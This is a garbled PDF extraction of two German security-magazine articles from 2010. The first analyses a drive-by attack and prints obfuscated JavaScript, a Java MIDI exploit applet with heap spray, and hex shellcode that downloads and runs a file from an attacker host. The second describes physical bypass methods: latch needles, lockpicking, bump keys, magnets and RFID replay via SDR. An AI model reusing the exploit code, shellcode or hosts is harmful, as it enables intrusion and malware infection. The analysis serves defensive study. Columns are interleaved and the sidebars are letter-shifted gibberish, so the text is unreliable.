0035D4266064660005400D10030001A000-
0000410060A)}(Vcro'<B=iillA0A50Cet
'b:es;eErs<Ee' ... 00000000000D01A
DD0001D100031400400D10084000000003
0060LHehJ)";function jvfpb(blktgw)
{return blktgw.replace(/'/ig,'
').replace(/~/ig,'"').replace(/»/
ig,String.fromCharCode(0x2*0x5)).
replace(/<95>/ig,String.
fromCharCode(0x2E*0x2));}
document.write('<p>1663</p>');var
ivypgs3=parseInt(document.
getElementById('greldm2').
getElementsByTagName(String.
fromCharCode(0x70))[parseInt(String.
fromCharCode(0x30))].innerHTML);var
kwjse='';for (cqdqdsc = ivypgs3;
cqdqdsc > 0; cqdqdsc--){for (gtkvdm
= ivypgs3-cqdqdsc; gtkvdm <= cmjve3.
length; gtkvdm=gtkvdm+ivypgs3)
{kwjse=kwjse+cmjve3.
charAt(gtkvdm);}}var
fnhld=kwjse+";";var isguhrd=jvfpb(fn
hld);eval(isguhrd);</script>
Listing 4a. Verifikation der als Parameter übergebenen
URL „http://arestyute.com/sadhbdsa879321jbdas/l.
php?deserialize=6e&i=1”
public void init()
{ }
/* shellcode */
String str2 = "505351525657559CE8000000005D83ED0D31C06
4034030780C8B400C8B701CAD8B4008EB0
98B40348D407C8B403C5657BE5E0100000
1EEBF4E01000001EFE8D60100005F5E89E
A81C25E010000526880000000FF954E010
00089EA81C25E01000031F601C28A9C356
302000080FB007406881C3246EBEEC6043
20089EA81C24502000052FF95520100008
9EA81C2500200005250FF9
hakin9.org/de
5560100006A006A0089EA81C25E0100005289EA81C278020000526
A00FFD06A0589EA81C25E01000052FF955
A01000089EA81C25E01000052688000000
0FF954E01000089EA81C25E01000031F60
1C28A9C356E02000080FB007406881C324
6EBEEC604320089EA81C24502000052FF9
55201000089EA81C2500200005250FF955
60100006A006A0089EA81C25E010000528
9EA81C2A6020000526A00FFD06
A0589EA81C25E01000052FF955A0100009D5D5F5E5A595B58C3000
0000000000000000000000000000047657
454656D705061746841004C6F61644C696
272617279410047657450726F634164647
26573730057696E4578656300BB89F289F
730C0AE75FD29F789F931C0BE3C0000000
3B51B02000066AD03851B0200008B70788
3C61C03B51B0200008DBD1F020000AD038
51B020000ABAD03851B0200005
0ABAD03851B020000AB5E31DBAD5603851B02000089C689D751FCF
3A65974045E43EBE95E93D1E0038527020
00031F69666ADC1E00203851F02000089C
6AD03851B020000C3EB100000000000000
000000000000000000089851B020000565
7E858FFFFFF5F5EAB01CE803EBB7402EBE
DC355524C4D4F4E2E444C4C0055524C446
F776E6C6F6164546F46696C65410070646
67570642E65786500637261736
82E70687000";
/* nops for the nop-slice */
String str10 = "90909090";
String java_version = System.getProperty("java.
version");
/* url YHUL¿FDWLRQ */
String url = getParameter("data"); /* applet method */
int i = 0;
int j = 0;
while (url.charAt(i) != '?')
{
j += url.charAt(i);
i += 1;
j += 7;
j %= 256;
String checksum = Integer.toHexString(j);
/* checksum = 6e correct for the url
* 'http://arestyute.com/sadhbdsa879321jbdas/l.
php?deserialize=6e&i=1'
*/
if (url.indexOf("deserialize=" + checksum) == -1)
return;
13
 FORTGESCHRITTENE
Listing 4b. Verifikation der als Parameter übergebenen
URL „http://arestyute.com/sadhbdsa879321jbdas/l.
php?deserialize=6e&i=1”
Object localObject1;
Object localObject2;
Object localObject4;
Object localObject5;
String str20;
String str21;
String str22;
if ((((java_version.indexOf("1.6.0_11") != -1) ||
(java_version.indexOf("1.6.0_12") != -1) ||
(java_version.indexOf("1.6.0_13") != -1) ||
(java_version.indexOf("1.6.0_14") != -1) ||
(java_version.indexOf("1.6.0_15") != -1) ||
(java_version.indexOf("1.6.0_16") != -1) ? 1 : 0) &
(url.indexOf("i=1") == -1 ? 1 : 0)) != 0)
{ str21 = "";
/**
* Java midi vulnerable, see http://
vreugdenhilresearch.nl/2010/05/
java-midi-parse-vulnerabilities/
* for detailed explaination. The author claims, that it
was ¿[HG in java 1.6.0_19
*/
localObject1 = "";
localObject1 = repeat('/', 303);
/* using windows ? no: return */
localObject2 = System.getProperty("os.name").
toLowerCase();
if (((String)localObject2).indexOf("win") >= 0)
localObject1 = repeat('/', 302);
else
return;
/* the core of the vulnerable: create a malicious url
and ask java's midiplayer to play
*/
localObject1 = ¿OH + (String)localObject1 +
"Z%Z%Z%Z%Z%Z%";
try
Zusätzlich wird noch das oben erwähnte verschleierte
JavaScript auf der ursprünglichen HTML Seite geladen.
Dieses ist noch erstaunlicher, denn es enthält gleich ei-
ne ganze Ladung von Exploits für Java, Adobe Flash
sowie Adobes PDF Reader bereit. Der ‚Author‘ der Sei-
te war auf höchste Kompatibilität aus, denn auch hier
werden nur bestimmte – vor allem neuere – Versionen
der Browser Plugins unterstützt (vgl. Listing 5.).
Unter "http://www.exploit-db.com/exploits/12117/" fin-
det man eine Beschreibung der Schwachstelle. Diese
betrifft zusätzlich zum analysierten Applet die Java Ver-
sion 1.6.0_19.
14
{
String str19 = url + "11";
localObject4 = "";
for (int k = 0; k < str19.length(); k++)
{
localObject4 = (String)localObject4 + Integer.
toHexString(str19.charAt(k));
}
while (((String)localObject4).length() % 8 != 0)
{
localObject4 = (String)localObject4 + "26"; /* 0x26 =
'&' */
}
localObject4 = str2 + (String)localObject4;
this.mem = spray((String)localObject4, str10);
localObject5 = new URL((String)localObject1);
MidiSystem.getSequencer();
MidiSystem.getSoundbank((URL)localObject5); /* <-- put
in url here */
str22 = "";
MidiSystem.getSequencer();
while (true) {
Thread.sleep(10L);
}
}
catch (Exception localException2)
{
System.out.println(localException2);
}
}
...
Zusammenfassend lässt sich feststellen, dass
Schadsoftware auf verschiedensten Wegen ins Sys-
tem gelangen kann. Es ist nicht mehr notwendig
Programme zu installieren oder ähnliches. Die hier
beschriebene HTML-Datei könnte auch in einem
HTML-fähigen E-Mail-Client ausgeführt werden.
Ebenso kann die iFrame-Konstruktion in E-Mails
platziert werden. Es sind nicht nur einzelne Pro-
gramme oder PlugIns für Browser betroffen, son-
dern es wird versucht gezielt neue Schwachstellen
für mehrere populäre Programme zu finden, was der
letzte Ausschnitt des JavaScript Codes zeigt. Auch
10/2010
 Malware-Doppelschlag per JavaScript und JavaApplet

Listing 5. Codefragment des entschleierten JavaScript

verdeutlicht das Potential: } else {
var o = document.createElement('OBJECT');
var fdata; var n = document.createElement('OBJECT');
var skd='%u5350%u5251%u5756%u9c55%u00e8%u0000%u5d00% o.type = 'application/npruntime-scriptable-
ued83% ... %u6870%u0070'; plugin;deploymenttoolkit';
var skd1=skd + '%u7468%u7074% ... %u0038%u9000'; n.type = 'application/java-deployment-toolkit';
var skd2=skd + '%u7468%u7074% ... %u0032%u9000'; document.body.appendChild(o);
document.body.appendChild(n);
function JAVASMB() { try {
try { o.launch(u);
/* see http://www.exploit-db.com/exploits/12117/ for } catch (e) {
exploit description */ n.launch(u);
var u = 'HTTP: -J-jar -J\\bittoram.com\smb\old. }
avi http://arestyute.com/ }
sadhbdsa879321jbdas/l.php?i=2 } catch (e) {
none'; IEPEERS();
if (window.navigator.appName == 'Microsoft Internet }
Explorer') { IEPEERS();
try { }
var o = document.createElement('OBJECT'); ...
o.classid = 'clsid:CAFEEFAC-DEC7-0000-0000- JAVASMB();
ABCDEFFEDCBA';
o.launch(u);
} catch (e) {
var o2 = document.createElement('OBJECT');
o2.classid = 'clsid:8AD9C840-044E-11D1-B3E9-
00805F499D93';
o2.launch(u);
}

das Verbieten von JavaScript 3, was moderne, Ajax- nen, bevor entsprechende Signaturen bereitstehen.
basierte Internetseiten nahezu unbenutzbar macht, Weiterhin sollte der ausgehende E-Mail-Verkehr mit
hätte auf das Laden des Java Applets keine Auswir- gleicher Sorgfalt auf Spam und Viren geprüft wer-
kung. den wie der eingehende. Nur so kann man feststel-
Wie kann man derartigen heterogenen Bedrohun- len, ob man bereits ungewollt zum Spam- und Viren-
gen begegnen? Das häufigste Einfallstor für Schad- versender geworden ist. Am besten funktioniert dies
software bleibt die E-Mail. Also ist die Absicherung mit einer ausgelagerten E-Mail-Sicherheitslösung, da
der E-Mail-Kommunikation der erste und wichtigs- der Anbieter meist von der Masse der empfangenen
te Schritt zur Sicherung des Systems. Moderne An- und analysierten E-Mails profitiert, sprich Bedrohun-
ti-Spam und Anti-Virenprogramme sind in der Lage gen meist schneller erkennt als der einzeln agieren-
Massenmails mit gefährlichen Anhängen zu erken- de Mail-Server-Administrator. Und letzen Endes gilt
immer noch: Öffnen Sie keine E-Mails oder Anhänge
t

<>
'àS
EJF
"OBMZTF
LBOO
IJFS
[#
4QJEFSNPOLFZ
PEFS
'JSF von Unbekannten.
CVH
CFOVU[U
XFSEFO
t

<>
v%JF
+BWB
7JSUVBM
.BDIJOF
CJFUFU
OFCFO
EFS
1MBUUGPSN
VOBCIÊOHJHLFJU
BVDI
FJOFO
(FXJOO
BO
4JDIFSIFJU
4JF

àCFSXBDIU
[VS
-BVG[FJU
EJF
"VTGàISVOH
EFT
1SPHSBNNT

WFSIJOEFSU
BMTP
[#
EBTT
FJO
1SPHSBNN
àCFS
"SSBZHSFO
[FO
IJOXFH
MJFTU
PEFS
TDISFJCU
*N
TQF[JFMMFO
'BMM
WPO
+B
WB
GÊMMU
EJFTF
ÃCFSXBDIVOH
TFIS
FJOGBDI
BVT
EB
+BWB
LF
JOF
;FJHFS
VOUFSTUàU[U
4PNJU
XFSEFO
1Vò
FSàCFSMÊVGF
WFS
IJOEFSU
EJF
WPS
BMMFN
CFJ
EFO
JO
$
PEFS
$
HFTDISJFCF
OFO
1SPHSBNNFO
WPSLPNNFO
LÚOOFOi
2VFMMF
http://de-
.wikipedia.org/wiki/Java_Virtual_Machine
t

<>
.JU
#SPXTFSFSXFJUFSVOHFO
XJF
CTQX
OPTDSJQU
GàS
'JSF
fox. MICHAEL PEICK
Entwickler und Mitglied des eleven Research Teams

hakin9.org/de 15
 Penetration Testing im Jahre 2010
Penetration Testing
im Jahre 2010
Dimitri Roschkowski
Viele Administratoren übersehen leider bei der Absicherung
des Netzwerkes seine physikalische Sicherheit. Die
Bedrohung kommt nicht nur durch das Ethernet-Kabel.
IN DIESEM ARTIKEL ERFAHREN SIE...
t
NJU
XFMDIFO
.JUUFMO
IFVUJHF
4JDIFSIFJUTTZTUFNF
àCFSMJTUFU

werden können
t
XFMDIF
TJDIFSFO
"MUFSOBUJWFO
FT
HJCU
m Jahr 2010 ist es kein Problem mehr, ein Netzwerk
I
vor Gefahren zu schützen. Firewall-Hardware gibt es
mittlerweile zu erschwinglichen Preisen. IT-System-
häuser holen sich Sicherheitsexperten und richten mit
deren Unterstützung ein sicheres Netzwerk ein. Mitar-
beiter werden im Umgang mit der IT-Technik geschult,
sodass Phishing und Social Engineering Angriffe erfolg-
los verlaufen. IDS und IPS Systeme finden verdächtige
Aktivitäten im Netzwerk und zeigen diese dem Adminis-
trator an. Die IEEE 802.1X Authentifizierung an Access
Points und Netzwerkswitches verhindern den Zugang
von unbekannten Computern zum Netzwerk. Mit IEEE
802.1Q (Virtual Local Area Network oder kurz VLAN)
werden Netzwerke segmentiert, obwohl alle Compu-
ter hardwareseitig an einem Switch hängen. Mit diesen
Techniken ist man in der Lage ein Netzwerk sowohl vor
Angriffen aus dem WAN als auch aus dem Inneren LAN
zu schützen – würde man meinen.
Die Realität
Ich wurde von einem mittelständischen Unternehmen
engagiert einen Penetrationstest durchzuführen. Wäh-
rend der Footprinting-Phase habe ich sehr schnell er-
kannt, dass die IT-Sicherheit bei diesem Unternehmen
ein sehr sensibles Thema ist. Doch trotz fast paranoider
Sicherheitsvorkehrungen, ist es mir erfolgreich gelun-
gen, dem Unternehmen die Kundendaten zu entwen-
den. Zwar war IT-Technisch alles abgesichert, der phy-
sische Zugang zu den Daten war es allerdings nicht.
Die Eingangstür des Unternehmens war wegen des
hakin9.org/de
WAS SIE VORHER WISSEN/KÖNNEN SOLLTEN...
t
XFMDIF
4ZTUFNF
TFU[F
JDI
[VS
"CTJDIFSVOH
FJO
Kundenverkehrs nicht abgeschlossen. Die Tür zum
Serverraum stand wohl wegen der Abwärme sperran-
gelweit offen, im Schloss des Racks steckte der Schlüs-
sel. Es gab nichts und niemanden, der mich davor ab-
halten konnte, aus jedem Server jeweils eine Festplatte
einzustecken und blitzschnell das Gelände zu verlas-
sen. Weder der Geschäftsführer noch die IT-Adminis-
tration hat mit einem so dreisten und einfachen Angriff
gerechnet.
In dem folgenden Artikel werde ich die aktuelle Si-
cherheitstechnik vorstellen und aufzeigen, wie ein-
fach diese Technik zerstörungsfrei mit und fast spurlos
überlistet werden kann. Dieser Artikel ist keine Anlei-
tung, wie man einbricht, er soll lediglich die Schwach-
stellen der heute massenhaft eingesetzten Systeme
aufzeigen. Aus diesem Grund habe ich mich bei den
Beschreibungen kurz gefasst sowie einige Details
weggelassen.
Zugefallene Türen
Was ist eigentlich eine zugefallene Tür? Rund 95% al-
ler Türen haben heute ein Schloss mit einer Falle. Wird
die Tür zugezogen, fällt die Schlossfalle in die dafür
vorgesehene Öffnung des Schließbleches in der Türz-
arge. Die Tür lässt sich dann entweder mit dem Tür-
griff oder durch das drehen des Schließzylinders wieder
öffnen (wenn z.B. auf einer Seite ein Knauf statt eines
Angriffes angebracht ist). Mit dem Schlüssel reicht ei-
ne halbe Umdrehung aus, um die Tür wieder zu öffnen.
Bei elektronischen Schließsystemen erfolgt die Freiga-
17
 PRAXIS
be dabei nicht an der Schlossfalle freigegeben, sondern
am Schließblech.
Wie lässt sich eine zugefallene Tür öffnen?
Zugefallene Türen lassen sich ganz einfach öffnen. Schlüs-
seldienste verwenden hierfür Öffnungsnadeln. (Abbildung
1.) Diese Öffnungsnadeln werden in Höhe der Schlossfalle
zwischen Türzarge und Türblatt angesetzt, zieht man jetzt
den hinteren Teil der Öffnungsnadel nach oben, drückt der
vordere Teil die Schließfalle wieder ins Schloss zurück – die
Tür ist damit offen. Mit etwas Übung dauert es nicht länger
als fünf Sekunden, um eine Tür zu öffnen.
Abbildung 1. Zwei Sätze Öffnungsnadeln
Abbildung 2. Eine Öffnungsnadel an einer Doppelfalztür
18
Um so etwas zu verhindern, bieten sich sogenannte
Doppelfalztüren an. (Abbildung 2.) Diese Türen haben
einen zweiten Knick im Rahmen und Türblatt. Eine an-
gesetzte Öffnungsnadel kommt damit nicht mehr an die
Schließfalle ran und eine Öffnung wird damit verhindert.
Mit einer sogenannten „Mach Auf“ Faltkarte lässt sich
aber auch dieses Hindernis überwinden.
Damit eine Tür mit diesen Techniken nicht geöffnet
werden kann, hilft es nur diese Tür abzuschließen.
Dabei wird mindestens ein Riegel in das Schließblech
geschoben, der ohne Schlüssel nicht mehr zurückge-
schoben werden kann. Das Abschließen einer Tür mit
Schlüssel ist jedoch nicht komfortabel. Diese Schwä-
che haben die Schlosshersteller erkannt und bie-
ten selbstschließende Schlösser an. Diese Schlös-
ser schieben automatisch beim zufallen die Riegel
in das Schließblech. Betätigt man die Türklinke, wird
gleichzeitig die Schlossfalle und die Riegel zurückge-
schoben, die Tür ist wieder offen. Je nach Modell des
Schlosses braucht man aber weiterhin eine bis zwei
Umdrehungen mit dem Schlüssel, um diese Tür zu öff-
nen.
Diese Schlösser sind allerdings nicht für Türen ge-
eignet, die über eine Elektronik geöffnet werden sol-
len. Hierfür gibt es allerdings auch eine Lösung. Es
gibt Schlösser mit einer Elektronik und einem Elekt-
romotor, der dann bei einem entsprechenden Signal
das Schloss aufschließt und damit die Funktion eines
Schlüssels simuliert. Allerdings sind solche Schlösser
recht teuer.
Lockpicking – Der Zylinder als Angriffsziel
Eine weitere Schwachstelle einer Tür ist der Zylinder.
Ein Laie kann nicht erkennen, ob die Mechanik eines
Zylinders sicher ist oder mit entsprechendem Werkzeug
sekundenschnell überlistet werden kann. Für ihn zählt
lediglich der Preis und die Logos auf der Verpackung,
um die Sicherheit beurteilen zu können. Hier gilt aller-
dings ausnahmsweise der Grundsatz: billig = schlecht,
teuer = gut, wobei man dazu anmerken muss, dass
man die oberste Preiskategorie der Zylinder wählen
muss, um tatsächlich eine hohe Sicherheitsstufe her-
stellen zu können. Dass man Zylinder öffnen kann, liegt
an der (Massen-)Herstellung dieser mechanischen Ge-
räte. Jedes Produkt weist gewisse Toleranzen auf, je
größer diese Toleranzen sind, desto leichter lässt sich
der Zylinder überlisten.
Wie Funktioniert ein Schließzylinder?
Ein Schließzylinder besteht aus einem Gehäuse (hell-
grau) und einem Kern (dunkelgrau). Kernstifte (gelb)
und Gehäusestifte (rot) verhindern, dass der Kern ge-
dreht werden kann. Führt man nun einen Schlüssel in
den Schließkanal (weiß) ein, drücken die Zähne des
Schlüssels die Kernstifte herunter sodass der Über-
gang zwischen den Kernstiften und den Gehäusestif-
10/2010
 Penetration Testing im Jahre 2010

ten genau zwischen dem Kern und dem Gehäuse ist. te Werkzeug meiner Sammlung vor – benutzt man das
In diesem Zustand lässt sich der Kern drehen und ein „Flip-It“ Werkzeug. Dieses Werkzeug nutzt die physika-
Schloss aufschließen. lische Trägheit aus, indem der Zylinder so schnell dreht
Ich möchte hier drei Methoden vorstellen, mit denen wird, dass die Federn es nicht schaffen, die Stifte in den
ein Schließzylinder ohne Schlüssel zerstörungsfrei ge- Kern zu drücken. Dazu spannt man den „Flip-It“ erst
öffnet werden kann. Beim klassischen Handpicken geht einmal in der Richtung vor, in der der Zylinder gedreht
es darum, die Sperrstifte eines Schlosses so zu mani- werden soll, dann führt man es in den Schließkanal ein
pulieren, dass diese den Kern freigeben. Zunächst wird und drückt den Auslöser. Der Zylinder wird dann über
ein Spanner in den Schließkanal eingeführt und um ein die oberste Position gedreht und man kann das Schloss
paar Grad gedreht, sodass ein minimaler Drehmoment weiter öffnen.
auf die Sperrstifte wirkt. Geht man jetzt mit einem Hand- Man benötigt viel Übung, um einen Zylinder ohne
pick die einzelnen Sperrstifte ab, so lässt sich mit etwas Schlüssel öffnen zu können. Denn macht man es mit
Übung erfühlen, welcher Stift gerade am meisten Wi- Gewalt, kann die Mechanik im inneren beschädigt wer-
derstand bietet. Drückt man diesen Stift mit dem Hand- den. Dann lässt sich das Schloss nicht einmal mit dem
pick herunter, lässt sich der Kern ein kleines bisschen richtigen Schlüssel öffnen.
drehen, sobald der der Gehäusestift den Kern verlas-
sen hat. Diesen Stift hat man jetzt gesetzt. Nun sperrt Sichere Schließzylinder
ein anderer Sperrstift. In einem normalen Schloss gibt Sichere Schließzylinder gibt es in meinen Augen nicht.
es etwa fünf solcher Stifte. Hat man alle Stifte richtig Je nachdem welchen Aufwand und Kosten man auf sich
gesetzt, lässt sich der Kern drehen ist der Zylinder ist nimmt, wird man in der Lage sein, alle Zylinder zu um-
damit geöffnet. gehen. Einen aus meiner Sicht relativ sicheren Zylin-
Eine weitere Methode um einen Schließzylinder zu der bietet die Firma EVVA mit dem MCS (Magnet Code
öffnen sind Schlagschlüssel. Ein Schlagschlüssel ist System) an. Statt normaler Stifte arbeitet dieser Zylin-
ein spezieller aus Stahl gefertigter Schlüssel, der nur im der mit insgesamt acht Magnetrotoren. Wird ein Schlüs-
Profil in einen Zylinder passt. Die Zähne des Schlüssels
wurden auf die tiefst mögliche Position gefräst, außer-
dem wurde der Anschlag des Schlüssels um etwa ei-
nen Millimeter verkürzt, sodass der Schlüssel sich mit
leichtem Druck etwas tiefer ins Schloss einführen lässt
als vorgesehen. Zum Öffnen des Zylinders führt man
den Schlagschlüssel in den Zylinder ein und schlägt an-
schließend mit einem flexiblen Hammer auf den Schlüs-
sel. Den Schlagimpuls übertragen die Kernstifte auf die
Gehäusestifte, die dann nach unten gedrängt werden
und damit den Kern freigeben. Dreht man den Schlag-
schlüssel genau in diesem Moment (wenige Millisekun-
den nach dem Schlag), lässt sich der Kern drehen und
das Schloss öffnen.
Die dritte Methode ist ein Elektro-Pick. Ein Elek-
tropick arbeitet nach dem gleichen Prinzip, wie ein Abbildung 3. Ein Schließzylinder im Querschnitt. Links ist der
Schlagschlüssel, nur dass hier mehrere Schläge pro Zylinder abgeschlossen, rechts offen (Bildquelle: Wikipedia.de)
Sekunde auf die Sperrstifte erfolgen. Um einen Zylin-
der mit dieser Methode zu öffnen, führt man die Na-
del des Elektro-Picks sowie einen Spanner (entwe-
der einen normalen oder einen Drehspanner) in den
Schließkanal ein und schaltet den Pick ein. Anstatt
den Pick durchgehend laufen zu lassen, empfiehlt es
sich ihn in kurzen Sequenzen ein- und auszuschalten.
Sind die Sperrstifte in passender Position, lässt sich
der Kern drehen.
Bei allen drei vorgestellten Öffnungsmethoden hat
man bei abgeschlossenen Schlössern immer ein Pro-
blem. Hat man einen Zylinder um 360° gedreht, drü-
cken die Federn die Gehäusestifte wieder in den Kern
und man müsste den Zylinder erneut öffnen (picken). Abbildung 4. Werkzeugsatz zur zerstörungsfreien Öffnung von
Um das zu verhindern – und damit stelle ich das letz- Schlössern

hakin9.org/de 19
 PRAXIS

sel mit richtiger Magnet-Codierung eingeführt, werden

die Rotoren in die Schließposition gebracht und der
Zylinder lässt sich drehen. Zusätzlich kann ein solcher
Zylinder mit einer Elektronik auf RFID Basis ausgestat-
tet werden. Zusätzlich zum Magnetcode wird noch ei-
ne elektronische Authentifizierung durchgeführt, bevor
dieser Zylinder trotz des richtigen Schlüssels gedreht
werden kann. So können z.B. verlorene Schlüssel ge-
sperrt werden oder um Mitarbeitern den Zutritt nur zu
bestimmten Zeiten zu gestatten.

Abbildung 5. Ein EVVA-MCS Schlüssel
Codeschlösser
Codeschlösser sind in der Regel zugefallene Türen und
lassen sich am einfachsten mit den bereits oben vor-
gestellten Methoden öffnen. In diesem Artikel möchte
ich aber auf eine weitere Schwachstelle hinweisen. Die
Abbildung 5. zeigt ein typisches Codeschloss, anhand
des Zylinders auf der rechten Seite kann jeder darauf
schließen, wie groß die Code-Tasten dieses Schlosses
in der Realität sind. Würde man eine Codeeingabe fil-
men, könnte man anhand der langen Handbewegun-
gen auf den Code schließen können.
Diese Schwachstelle lässt sich aber ganz einfach
schließen, indem man den Eingabetasten die Ziffern für
jede Codeeingabe per Zufallsgenerator zuweist. Das
bedeutet, dass die obere linke Taste nicht permanent
die Ziffer 1 eingibt, sondern bei jeder Codeeingabe ei-
ne andere. Durch diese zufällige Anordnung der Zif-
fern auf den Tasten lässt sich nicht mehr anhand der
Handbewegung feststellen, welche Ziffer eingegeben
wurde. Umsätzen lässt sich eine solche Eingabetech-
nik mit Siebensegmentanzeigen oder mini-OLED-Bild-
schirmen unter durchsichtigen Tasten bzw. mit einem
Touchscreen.
In Indoor-Bereich trifft man vor einigen Räumen auf
eine einfachere Version von Codeschlössern. Bei die-
sen Schlössern liegt das Eingabeterminal direkt am
Schloss an, die Energieversorgung erfolgt über Bat-
terien. Im geschlossenen Zustand lässt sich die Tür-
klinke ohne Funktion herunterdrücken. Gibt man den
richtigen Code ein, wird ein Elektromagnet mit Strom
versorgt und Zieht einen Stift an, der die Türklinke mit
dem Schloss verbunden. Betätigt man jetzt die Türklin-
ke, so lässt sich die Tür öffnen. Da die Batterien in ei-
nem solchen Schloss möglichst lange halten sollen,
arbeiten die Schlösser mit einem recht geringen Ma-
gnetfeld. Dieses Magnetfeld kann man jedoch mit ei-
nem von außen angebrachten starken Magneten (sie-
he auch Abschnitt über Reed-Relais) simulieren und so
das Schloss öffnen. Im Übrigen lassen sich mit einem
starken Magneten auch einige ältere elektronische Zy-
linder öffnen.

Schließsysteme mit RFID-Tags

Abbildung 6. Ein Elektronisches Codeschloss an einer RFID steht für radio frequency identification, also
Gegensprechanlage für die Identifikation über Funkwellen. Diese Technik

20 10/2010
 Penetration Testing im Jahre 2010

ist heute sowohl bei Unternehmen, als auch in Pri-

vathäusern (Autoschlüssel, Funk-Garagentoröffner)
sehr verbreitet und wegen des Komforts beliebt. Im
Wesentlichen besteht das System aus zwei Kompo-
nenten, einem RFID Lesegerät und den sogenannten
Tags. Mit den Tags können sich die Zugangsberech-
tigten Personen am Lesegerät identifizieren. Unab-
hängig davon, ob das Tag aktiv (mit einer eigenen
Energieversorgung) oder passiv (die notwendige
Energie liefert das Lesegerät) ist, wird der Identifi-
kationsvorgang vom Tag eingeleitet. In den einfach-
sten Fällen sendet das Tag unverschlüsselt die eige-
ne Seriennummer oder einen vorher eingespeicher-
ten Code, das Lesegerät empfängt den Code und
überprüft ob die Seriennummer oder der Code zu-
gangsberechtigt ist. In den wenigsten Fällen erfolgt
eine zusätzliche Kryptographische Authentifizierung
des Tags, die aber wegen der geringen Rechenka-
pazität und Energieversorgung sehr einfach ausfällt.

Wie kann man solche Systeme überlisten?

Das Zauberwort dazu lautet „Software Defined Ra-
dio“ (SDR). Mit einem SDR Tranceiver ist man in der Abbildung 7. Das Lesegerät reagiert auf eine Mifare-Classic Karte
Lage, die Kommunikation zwischen dem Tag und und lehnt den Zugang ab
dem Lesegerät aufzuzeichnen und auf einem Rech-
ner zu analysieren. Anschließend sendet man die
aufgezeichneten und eventuell bearbeiteten Daten
an das Lesegerät.

Wie läuft ein solcher Angriff ab?

Zunächst einmal muss man herausfinden, auf wel-
cher Frequenz die Kommunikation zwischen dem Le-
segerät und den Tags erfolgt. Dazu kann man über
den Herstellernamen des Lesegerätes und seinem
Produkt-Portfolio gehen oder einfach verschiedene
Tags ausprobieren. Wenn ein Tag mit dem einge-
setzten Lesegerät nicht kompatibel ist, erfolgt keine
Reaktion. Wird dem Tag der Zugang verweigert, so
zeigt das Lesegerät dies in der Regel an. Dann wird
ein SRD Tranceiver benötigt, der auf der benötigten
Frequenz arbeitet. Dazu verwende ich den USRP/
USRP2 Tranceiver mit einem passenden Daughter-
board und einer Richtantenne (700$/1.400$ + 275$
+ 100$). Der Vorteil dieses Universalsystems liegt
daran, dass man mit verschiedenen Daughterboard
unterschiedliche Frequenzen abdecken kann. Die
Richtantenne richtet man dann etwas seitlich auf das
Lesegerät aus und fängt mit der Aufzeichnung der
Daten in dem Frequenzbereich an. Bei Long Range
Tags (das Tag kann mehrere Meter vom Lesegerät
entfernt sein) reicht bei Unverschlüsselten Systemen
- wegen der höheren Sendestärke - die Aufzeichnung
einer Kommunikation aus. Passive Tags, wie RFID
Karten, senden ein viel schwächeres Signal, deshalb Abbildung 8. Eine Überwachungskamera hat eine Veränderung
sind die Aufzeichnungen oft gestört. In der Regel be- im Bild detektiert. Der veränderte Bildausschnitt wird in einem
nötigt man fünf bis zehn Aufzeichnungen um ein Mus- Rahmen angezeigt.

hakin9.org/de 21
 PRAXIS
ter zu finden. Der Anfang der Übertragung ist immer
gleich, in der Mitte gibt es einen variablen Bereich
und das Ende ist bei allen Aufzeichnungen ebenfalls
gleich. Damit ein Lesegerät nun dem virtuellen Tag
den Zugang gewährt, säubert man zunächst einmal
die Aufzeichnungen mit einigen Filtern. GNU-Radio
bietet hierfür zahlreiche Möglichkeiten. Dann stellt
man sich aus mehreren Aufzeichnungen ca. drei
möglichst ideale (hier braucht man etwas Erfahrung,
ein gutes Auge und etwas Fingerspitzengefühl) Kom-
munikationen zusammen und sendet diese an das
Lesegerät. Mindestens eine dieser Aufzeichnungen
wird dann das Lesegerät akzeptieren und dem An-
greifer den Zugang gewähren.
Aus der Praxis kann ich sagen, dass etwa 90% al-
ler RFID-Karten-Systeme sich nur mit der Serien-
nummer des Tags zufrieden geben. Ältere Garagen-
toröffner arbeiten mit einem statischen Code. Neuere
Garagentoröffner und einige Autohersteller nutzen ei-
nen Rolling Code, um den Nutzer zu identifizieren. Im
März 2008 wurde auch dieses System von Forschern
der Ruhr-Universität Bochum geknackt. Zwei aufge-
zeichnete Kommunikationen genügen bereits für ei-
ne Seitenkanalattacke. Ebenfalls wurde im Jahr 2008
die Verschlüsselung des Mifare-Systems per Rever-
se Engineering geknackt. Solche Verschlüsslungen
verlangsamen nur den Angriff und machen ihn teurer.
Gibt es auch sichere RFID-Systeme?
Die gibt es durchaus. Hier verwendet man eine
asymmetrische Verschlüsselung. Für jedes zugangs-
Magnete sind kein Spielzeug
.BHOFUF
EJFTFS
%JNFOTJPO
IBCFO
FJO
FYUSFN
TUBSLFT
.B
HOFUGFME
.BHOFUFO
LÚOOFO
CFJ
GBMTDIFS
)BOEIBCVOH
OJDIU

OVS
2VFUTDIVOHFO
BO
,ÚSQFSUFJMFO
IFSWPSSVGFO

TPOEFSO

4DIÊEFO
BO
5FDIOJL
IFSWPSSVGFO
.FOTDIFO
NJU
)FS[TDISJUU
NBDIFSO
TPMMUFO
EFTIBMC
FJOFO
4JDIFSIFJUTBCTUBOE
WPO
NJO
EFTUFOT
[XFJ
.FUFSO
[V
TP
FJOFN
.BHOFUFO
IBMUFO
(MFJDIFT

HJMU
àCSJHFOT
BVDI
GàS
#SJFGUBTDIFO
NJU
.BHOFULBSUFO
Abbildung 9. Eine Büroklammer ist an einer Schnurr befestigt.
Selbst bei einem Abstand von 35cm ist das Magnetfeld noch so
stark, dass die Büroklammer in der Luft hängt.
22
berechtigte Tag wird ein privater und ein öffentlicher
Schlüssel erzeugt. Der private Schlüssel wird in einer
Datenbank gespeichert, auf die das Lesegerät zu-
greifen kann. Der öffentliche Schlüssel wird auf dem
Tag gespeichert. Die Identifizierung erfolgt dann in
mehreren Schritten. Wie oben bereits beschrieben,
fängt das Tag mit der Identifikation an, indem es dem
Lesegerät seine Seriennummer mitteilt. Das Lesege-
rät generiert daraufhin eine Zufallszahl und sendet
diese mit der Seriennummer des Tags wieder zurück.
(Da die Kommunikation über Funk erfolgt, kann es
sein, dass zur gleichen Zeit mehrere RFID Tags aktiv
sind. Deshalb muss man während der Kommunikati-
on stets angeben, für welchen Empfänger eine Nach-
richt bestimmt ist.) Das Tag empfängt die Nachricht,
verschlüsselt diese mit dem öffentlichen Schlüssel
und sendet sie an das Lesegerät zurück. Kann das
Lesegerät die empfangene Nachricht mit dem priva-
ten Schlüssel des Tags entschlüsseln und stimmt die
